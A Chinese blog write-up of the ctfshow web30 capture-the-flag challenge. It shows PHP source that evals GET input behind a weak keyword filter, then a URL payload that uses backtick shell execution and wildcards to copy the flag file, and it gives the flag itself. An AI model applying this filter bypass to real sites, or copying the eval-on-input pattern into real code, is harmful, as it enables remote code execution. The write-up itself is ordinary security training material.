ctfshow-命令执行-web30

Post author:xfxia
Post published:2023年9月15日
Post category:其他

ctfshow-web30

题目描述：

在这里插入图片描述

原理：

同web29

审计：

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){   //过滤flag、system、php
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

方法：

思路：

绕过对flag 、system、php的过滤

1.

使用
闭合代替system函数

payload:

http://8ca17cf9-6238-495d-8ac7-a2007090a968.challenge.ctf.show/?c=`cp fla????? 1.txt`;

访问1.txt

http://8ca17cf9-6238-495d-8ac7-a2007090a968.challenge.ctf.show/1.txt

在这里插入图片描述

Flag：

ctfshow{d2ecf08c-e5ca-479c-b3b4-aac55cbec5a1}

版权声明：本文为weixin_43400535原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

原文链接：https://blog.csdn.net/weixin_43400535/article/details/121021170